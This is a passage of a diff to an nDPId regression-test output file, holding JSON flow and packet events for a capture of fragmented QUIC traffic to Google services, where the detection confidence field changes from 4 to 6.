IHwQW4JxQZkf9eUmK3IFE1g8uPWvlB3korqRC3X0AcAV+sx3QBx\/qT\/7gF6DFP2pyevadhyCvcOrG457OyVD1AcTPiu4iyRPIPs0ZJvBKST0kuFIAK1RoJYGXKAWb6J9ZLx+s6hzq\/1f\/0fVYymn2hbZDLHShxwbQkfEQlrOwalUO2ySwNcLdHaWrgafMwU1Jqwy3c2Wh9mqTVQACa1BySgEpwrkwNkoUZ7lai8AVhdHtwXYpL1gB\/TH91SWvUyF9Dvtha9t5tE0iXlmpfJuZOaqCkHSIu0XSKSxIBe2ySee8BdNbxqds4tKl3kUNeesA0aLrk5BIYrRjA9iqsg5i85TcPN7ilOO\/einXalctu3yF2I12P95cnmn8dVV+5aGLhS7eTX+TflkPHiEhNljw7cP3w4P+5GLFwM5tudCaDLA6afeuHwRmNyu4EHuYIuyQ95\/VnxA50tA8cTxnIXtWDvz\/V\/1jC10E8ZRQOx5RAzeQuGCKL+yBkb5e6xUFflBWfYCece3PTocANgv7MamRt+5dIoEcXIWJrMMSlrfY87Sjfbdyjyitgx\/3GErSHkqQjzECLn35cePuOYXjGdauoaI0FdXFxX0N4pWRgIFSMOMgv7WGHyUa7JL2uW1l6IWs4\/VyxVO7nYI1RKa0HSXbv+H2wrJyMWxXEF+FapMN8qENUanZn0DBN3nS29l14g27PiX1KosPCMvNsAEyL+FHupF8wbuG7hhioKZRauujDguEg9ExQ0m3tL2dBvtN5ROVDD26LyzDaWTk5zwZ2+bt9\/cncF+BxskyVsaDrMG5BAD+R2MBcjstM8WCqDrGmpTzd\/RDmbyfQ94p8EE9NW4bT2joZcpOovGfpfSmOfPG01l3k3sCykGLsIrKUzsxdgNn2SuQjCvYA92JZ4glYI"} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621499083794,"flow_last_seen":1621499083794,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621499083794,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":49217,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"safebrowsing.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":146,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621498081522,"flow_last_seen":1621498083623,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621499083794,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":61202,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} -00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":146,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621498212950,"flow_last_seen":1621498215051,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621499083794,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"128.248.24.1","src_port":49521,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621499083794,"flow_last_seen":1621499083794,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621499083794,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":49217,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"safebrowsing.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":146,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621498081522,"flow_last_seen":1621498083623,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621499083794,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":61202,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":146,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621498212950,"flow_last_seen":1621498215051,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621499083794,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"128.248.24.1","src_port":49521,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621499130835,"flow_last_seen":1621499130835,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621499130835,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":61286,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02319{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1621499130835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621499130835,"pkt":"AAAAAAAAAAQA+mr7CABFAAViautAAH4RX5w0uxSvxkodT+9mAbsFTpEZw\/8AAB0IgC3o3GMiP\/8AAEU0PdKy7uKG3ARNfT09pZj4weIAx8vl1AZI+zMCTSNcyqisuLogUxNuVvaYt3\/glQ+D6lndRNMSuyW6j5yustnSGakysxsalXmdT1UcNTCHKHLeg8MGYbFf1nX95GwKiEKdI50HtYAVtBQjTNOTIu4nPcMX+lDl5V6\/ytmtC7XiQnbKGjmWQm\/5MDqEu40hggsQtcdk2jnQjgDTlviz5K19+Tr1C9ZtBh0pIi4\/9HJR25mhrL6n0N1dPzZ\/Sqk4b9t3u89S9E30HZYdBGpKBZsCH9hWFAhEmi7j9zZtGj\/cxAMeBcWRYInSCSDQRHhlkWsdmuRhy3Q07JJw\/pEuGWxhUDuVEci8KtERueLkLLLpEexZVihN4fEprEovribmXQoru+8BTBV+JKFqpyK44xLUOIK69w2LDvW\/c9dPKklcJAIVdwv\/H0kgY4YqDOIxKOP84t7SjU2P\/ow0Hgn\/JAdJ6i\/lHci\/A9+cu9\/Xk16H553fgdhUwRGo3ALZoNMzPzZ1o3fb5FWDfOha3mWIsBgUxeNt4buHg+jzgWf7W+8y6hmDLWrPKxyW2XOx6tYTJz3Xjs+\/mCn0wh\/mAZ+1hWOefp3U2Y80XBDgcJQRXavyO05wNoq15SpWKscYO5J7keXA83swiPGep5RyjOBdKfiII0v1ao+0rcEj0azRi8HmEhA\/AjmGfVSAAHVwBUamRC5+huXrgR7MEVx67+etgSdyuW\/yAF8xKZdh7YH+6wKsN72y7zdLpHJKk0SbAUI46TifMcEIMeIjlEPcVZXIE5rZ5rAAIrKbutpPELqhKDRo+C3oR4n9djDZXmF+B4O61eZoj26V8iiMi3Ap\/CD+ILTxN1vpLCz34kzpWw+Nvi\/ei8CsOgprWtklqFizkd0rAcDGEQGgQUmScGmGMEFTP7Tg2c0rd2YIJhDkQOLfYLZbFQ53RWO0Pggj\/QDl2rb91M5mdkJT0X64J45SyH9PR\/Q3NGgNCplgG+Zi1JMbY22khGyCv03BTfHcT6hnjWVcK0KimWhXdtO40IIpbzn37UO9Luj5lbbwTxA+F15tWNy3XlcT29pBTkrxIoD1a7jgZwe2L1\/Ov4CPoXZLMCQMQHvebHhxwgktEDCOQHeufOAARA9+ttGIYLmddJgygIHV+Z0m9eIUy9kSZvBlaoiT+1q5FRgi4aM7OXeRlcCnvKKLkhgPWsdD0iPMWVSO46LUV89lhtNMGfdtBxkfsOg+W5oXMWMpj9KmR6kowFzf9zj2QyWQFYmhpTbluKm3xfoGLLarkejEApaHi42nZxpainN+yR4Xj1CvqK7729lw20TkDJxJys8CkR6zRpnmDL275nTf\/h6umI\/BjPRIRIgbx3bSDq20ohdXKRrSZXC\/Arr5YfL+XhMgAUJbz3r4XwrrmclpOMMJn2kr\/gs3To4em\/HdWYqxdT6aST7ERX9KK04xNC6\/hrkuQzcRruUkuY3mUT8iKJjTr46ie2j\/A1tng3m3VKM0t\/2rfAm08hZWqsveRgilR3Zm78b9fgxj9VY8tmIh3i6sK\/djJUOnInRG631tWG0Qe1eRXSJgMeHizDi47oScl6deUbLalH1IvbrClHklGE\/ZcbaAKgwr43r+5MEM4cfDxEWqZaPxzsAHgwOhwkmTZ30Jhi+c4as8kD0LDD4tAMnjZY1FLuGbtQbU3BlRBN9KIN1hHKMv01OPEqvqTE8yp4iGqB9BypJrEEtRX\/ZZWohZEKxDzLUAu7MMY9Va00pq66LfRVHtgBgFkrrN5Dlw320q"} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621499130835,"flow_last_seen":1621499130835,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621499130835,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":61286,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"safebrowsing.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621499130835,"flow_last_seen":1621499130835,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621499130835,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":61286,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"safebrowsing.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1621499131134,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621499131134,"pkt":"AAAAAAAAAAQA+mr7CABFAAViavhAAH4RX480uxSvxkodT+9mAbsFTiPZy\/8AAB0IgC3o3GMiP\/8AAEU0xNPHNjkzcBN6tG3CMXMgN1VQUQ5zORwwdJvxC+4U4Wo768p0CS6oitGkvJZyjwyc3OomATdmVH8dl4u8+5ZoRqU5nHzh8arBwEn1ailAEl2\/FeLrAKukjlpYd2Uk6yjAdkKgzRJUrt7\/axFA3LL6O7tdgC5hzo0E0\/vl4YnagMJM3wjFjjHYO2MS55fyThkTKtMGKHzAVPiKv2kKUgzu3g8FlFf4vERg7PBca9iFQwa1e6czfFLHU3jmlRamr1hxIWC8ey9XXVda7oP9kCT82UgKpNgsvn9ag0yB6QxqI6o91lGsTfzgwNOJcVvwV3aY2qjfabeDbzPU82GWmC8dcxg60wWM23VAAZlVYaqE14ppMMyorKrKFMn+86H5\/aNgSXh0MxcYpilmN6MgsD5Jpkp6OIphsmHoNdSCO0UVCwGJhSGovYG83XAmetDlCEUuBf6MaZFXBjrfL+9+VHX4irSmtkovc6L5vSe3Nf\/Ub6qgARu+YW6Wwl4tUjGEcM7JKUQxN2Ukg1PimEsh9oAZ12nyYh9FV1JccWxNJ2iNa0HzjjZKFHsI+Wpn2wjQu6fGLrQdYisl3dxVlFj4jvRBju6QBGPqW8L8vdchXv3SI7zqO+NhEBqeCwisAVMGs3\/e0eLRoiqrlCvpzdd6wmWwzublWtkESFBS+GKBzAzbuO4L4Jk3UFfDunCYtqzhO+2c92mAtqsWUkc7CKf7i5TjKJZM8unl261yU\/jXeb6zhnBK28FD6Pf7vze97LmpT5VanmKiGpb8ZFvlX5LvJwFqOst\/Op1D8Xr+i6cOe2zujddvgkGRpWHduSyvlJRv5eRBop0FHOugDZjHwRl1P5GOEDM7AA1rf2k\/IZ6eHOqZsGK6AJyenzNCgwn2VrrkC9JsT5B02qcBGp2ieI1StsetnNDeBxqD01kqrPTmpVvwJxCy2yxgJrEXUggkwFbWIS7thWSjjhXDU0J1GP9L68+5UUKxu0743nekpL+HTPJD4N3h3CVTgzlGthPYulkO8tpw\/xmwb4Z53Jqw0aGKoz+dhDGMih5n97yaHi969BtPXsVrXOzMwgYDcGdHV6VGFDrRp8MvBHKVCcSB29+r+o\/y7gXXTkYGvFUdNPQnjtOPuTA3g6ED4ZH8pHwnFuthO9KrwMMPO0Bmio3US2E5BtPsHcZEVYe8RumZt3y1QcMWOvon\/UMvBjIjvrv0jsdmxjixC9tBFNbGe7r97P3sSHcFQ62T6BzS\/+NgBh1Yy4NhP5OC50DrYOUUKT2FWmyPF3rEeN7cKlVvDoToDTZvmnHz0lXki3TSjmEpfEl8VTrO2dVRjEyX6UGi07VXGODj7O0oDpUYCDjmG1IY0i\/swPCy3NuNEJt8yL0p3nKFjn1FYCc72eaCLxOWLqdkUlTWvm8YpTERh\/\/2jrhdGM0qtsJ7FcXHR51v4J\/QVf7rdJwPLrxNThdnZTGK4C1SIOXmUd+I7RAsVphCtMqkYz2xSC9bj0qFHuk+dNgchK\/qNK7D\/3TQluL6drX87zcJEWbeEAz++Bs4gMrOfH1c41XMna9bpL8uXPg\/gpvGR2NJd9tPrZADqH\/l\/5rjIhOiUnkWVyo0TCuowGc1U+R+LzRsroJKH\/6INUIkFvJyqDDWDuiqbuF4a8ofyZWpGKXbY6tbrxR5vwaHY6nEBEtgpQDNpXreT8uG1VJNuS0qFW1sMAQeSlsJF2xsZqjv925b07nSHBK8aJ++l8pku10eV9oj5mc55it2ZlpB3G4BEsXbBXW0kaMazv8X"} 02316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_packet_id":3,"flow_last_seen":1621499131747,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621499131747,"pkt":"AAAAAAAAAAQA+mr7CABFAAViavlAAH4RX440uxSvxkodT+9mAbsFTucGw\/8AAB0IgC3o3GMiP\/8AAEU0O8kVjzdhFbU85yBt1iwqehVgv2Jezj6mn9SdO\/xAMoQ6Qj2CZu4L+khp0ED4qwgVsRimpW9+019RfzBmCFh99aBBiZCv05rUnXo\/AfLOGNQtnfLnIt22QaI4txCY1wQh4\/Yqe+fANHZK\/ZmF\/8jsdmd71qfw03URemmchuDEmTC2QyCtQDR6IgH1doVCRoOWgfqOlswkaRTmqWfAdyO82HcYIhAl\/HvuxVmWaTRo+N+1Uvg3vOoeFbmkRfA3yUNsNKKXj3CuZnmwqgawAkhvUNunDuSNb6sXcWQSLMYzSYokvzGSrnCUFzWEzLjsIIkXyik5WMtbabj\/rXxW\/BmKnGxQAsyLYjlGWLl8IsRIUrFFSYYnArQnHAypfPl5sP2d4bIyERB5Xk+W0ngzdIfL9its1S\/1UVAsH\/LCTr4l85qg6B3o5lI7DKEPxygD1vV7v2kHUJUOsz6IQEA5cB8per0TSrcw70EjOs2PB2X\/KlkRtnF3cJ9mBrlLk7KkAdUnU+mv18q7Ur\/HRCeSKZ1IDGV+ySb3Pkkbb41pvETv2t9LoyQAD6Lzg0sSPQ7JLV2KhP1jHyct5463eYlSDK4lKsa29bix2j9nRvZdlPAs7HziAX+7Yre3QLRHAPqf\/Fg1bbLM5UQ4fWOBRZxhjJcdvgOJYkAXggHGTSKUtw58FK258BEuvGOXPaZLUbUPnco5cBPBIPnVm18eagNa8I5hoD3V4qJwr9MuaRW9lHG4afIywkdpNhJvwCaU0fJZ7zWnop85QgRGJTV5214WTZL+EUJZ8twDwaNzSY1ggAfatI1G32TefYqPxD0muHegRu5a+vh6GU9Nr4OZ\/spphiT2QHSVclDaYx2okizMN5ZYBs0bQln9i6XBm2Xldh+51uDHmQ4Zzp5v5YqyrRXhV0FfzvxrdzKY7KJJQgW29XcUFfrN5qG1mzTku37OdUh4OsIIhl78ZXl7b4B4gtfU2MlbyD0x5w27\/HBKRN75vA6sVD4434hZz0CVYEpHiS\/\/F+U03dYEtR9fBHiid5ECmvh8ygYyirip51ZPSMQ+xf+D7QciO3qwP0jr6a1lkCiOGvIgtxOPSkwBE14jvn4b4AgoxAwzxMoNWG+KiIzQcc5d77j3SVtd+zufZsoTaSVxvbWmtRH0a31c5XS8D\/F0m+6IrOG+sVg+DE76dDddFTb+w9dffyNc0Dy2WGhcNHMlytYl3hpyDxLT5XyRXvjxA0\/VLZiYU4eZ4ElyHnvoUsVc1zIaglmrF+UZkxVlMip6nMHZ9lAEsM5\/RJYf6oyNArAqc\/usJ\/9w+reh+ZP71fVKQMu8hkbAHifaXr7zINN8beOioIt1MpZKpcyaXZRCKvAOiunMN2HFg7gb4p\/O\/EYfkBy\/QNmvkqv63ADfvqVNbE3rlc1Spji+jLBIq3nPFuy\/5gX\/hKpM6V+1cWwiQk9pBOX4ZM5SBBKjwpGA59adqr0mV2fpXKtxohrt1P7YEzdHgk6wi5UR4cnhpR6ATzawptEewUpLpO9E5\/GgMkhT3mM2LdLlAJbflcld+TxymmmNvb3UpmjyGh3\/j4AG85zZBWQGL4jZJFWwd8JkedM8UyyY3+J7Hf7Llgt2XBjEica1HmobGyVnvxPpQPkJ3hFFYALzmeLaq88STNOaZPk6gzd8otilv70M1Uie7Wd78Y3H+OJSDOFEeZSWpO7cC\/0ENxs6hxSkpuU\/vHtior07jJ7OPSapjbYusV4q2O8nnSUJJ+wHjLAkldls5Mo1vwKpLEojKmMh"} 00606{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":150,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":150,"packets-processed":149,"total-skipped-flows":0,"total-l4-payload-len":201150,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":98,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":98,"total-idle-flows":96,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":448,"global_ts_msec":1621500710201} 00635{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":150,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621500710201,"flow_last_seen":1621500710201,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621500710201,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"102.194.207.179","src_port":53260,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1621500710201,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621500710201,"pkt":"AAAAAAAAAAQAXWCjCABFAAVidHpAAH4RAzE0uxSvZsLPs9AMAbsFTi9Ky\/8AAB0ItCn86+Se4YgAAEU0MHhrfbtIJTtH3QVY6F3aeUtwMPN+HFDoLuLJNWWF83Oo91F\/IrU\/4VzzpTeT2Fs3WeheARS7a3eJ6+jBx50KgL2Mtap+DJiMUnv5+MiK\/lUO39U0cv8d7GpIK\/I60LKV\/5UKO3hYdAl9H3sKf\/17sYn0RqCxn3h27SFb14UfQMrK5fzHbBIcyCTwAI8EH1FUNiii2EHC6MKWOlasY1W7tTdhYLqIJe3Pnw\/eMMH4EH67C816p5GMiQfDThgfQ2wgQHnziUTQvAMRReqOG70usUWRBc0H+BQ8YvPfZECfgPywP5jcJ6yFiW20NNxDHB6aoJ4Cj+YV3HYe3hWH6RtYkzgshfY2d5Z5SXiixf9F396ika8t5YhgzUJqm3qaduYkkuoKsKEzuoXUVwFjy4mdMVXENEyNoKQ+m7hVG2MtxWAe5F0iilBt4B+B47gPKblladD3cYJ89FSWeT4JmrpSKq+sitEawWg8mHrgGTQq7NYbu7N+XGgNwfYKSGmo+wJ4PZoiqprX5abZOW0AcEO4GmP23kcsiaw6jBKGRiI62wQkX3CdcrDC94UAE4ETeCTM7KGTkc2NjqYwxvCRWtYhRE2jKZjoxjsBPN71ErHefn1F+hbfKNlDzSGX\/XS29PsKXDs3Zy7d5AvyJhbeMO5c9ZW9Z367PIIkmQCfsx7uUon\/NyNKlzzrFPmj4\/Q5MNYmYJUzIjfkdbkREP\/oi3qdVUZRk6Qq3mEyntdw2m0x+Fl9NnJmI7wPyTSTYM1zGxtoprNKLZoKHPJUdriJdNO1mtZLgz\/iMksWRPpo1KJv17xWq6zVr1T5Rb\/56VZDZZTzvvnDR3LfObrvTjxHZjpDe470INkM91Ng4x1MGEIzMvtmxatbi7QsiBiDO\/OqdD1JZRhadEr1SeF+j+x3pCgDJPrTxUQNeLKGpDOINsHcCNzi9E6t6xSea+mxi6UCuZeVqiu7Mq6oTDEdYhM0f2zJdDmUwxt9ntbOaqb\/70GFQw3Pu6A6FPriLWgxfjbt820gGfdllAq3bd17xNlN89\/sslY71CRXr\/AXS9zW9TVm9cE3ieGVRvpPlBXLxR3CcDRad5beYHB2p+59RVP4JEz3gq5xGAJk56U10gDcUMuTu9lOP0LVK6rTCu109YNLsvJwHDQHJg6cMb9ghMycYjRH9R8GiFVxeXk8FZUVTPEwK19hu5R3J4CDXQi+bSlYR8ZWUeNFXdURMnp1LQodsU7HXmk0DNjXTkB48gPiecCbmUF+uqaDsBFruhCgfz1ajvkEGLeVbKosgz80uhsQmk3MpvR16f+ZOAa9cii2ACYegZ1+a4KEx2NvHlXUrXa2GOsjIAygu7UkwCjyJDh\/KLNwjSadZAQTyM7O4lGORdsjV5FzQj3iyRFzjEjdAaMYFQh7u74sj71sIjcdgnajLAngwvieEOhjfkDL0tvg0+xr2ScehwvmJTYQZ0A4LvQTGmQ0QSop8E3Bdjoib9O4UduuWyY49M20Z07qfK9fbUe3P7MyS0IssG5j+o2HGVtB2rGDGegUxPzqBriraNuRetc+27PYobO7JO3W\/n8cUzNrheWIWi9IB4U+pmyDcJIP58jjktd5G89dt6sAMJR3A5kbmIbJ9iNmSo5NdNog3tnD5t5HDujKlpjs5YYJJjfEpJdk07sWx3cs35o4J40ZUcj6dz2f5kyw3ZDKB\/hzEHArYpTkaJY4Gfn8PS30KdL4TNAJjWtoOfQevIKVcxh5IQLx0UwAHLDP4qnlqslqSloufJGz2Uh8"} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621500710201,"flow_last_seen":1621500710201,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621500710201,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"102.194.207.179","src_port":53260,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621500710201,"flow_last_seen":1621500710201,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621500710201,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"102.194.207.179","src_port":53260,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1621500710508,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621500710508,"pkt":"AAAAAAAAAAQAXWCjCABFAAVidIBAAH4RAys0uxSvZsLPs9AMAbsFThGvwP8AAB0ItCn86+Se4YgAAEU01ef7l0UP4woUE5dsuDr8jBLUL6glp4Hay+1PVqJ1qjZhTrhZ\/HlCWneFdokdJJCHL9aLl4EI+zRfD\/McWX32i\/GREyeHr4lMy4TiI6zbvduEowF9eNA5Tp3OZ9GCbt+VMsYazwXNCMv7NFAV34d4tKKg3LHgAaEVn2Y+UbC2G+bYh+I3BU7O10HCLFpy7dljaBL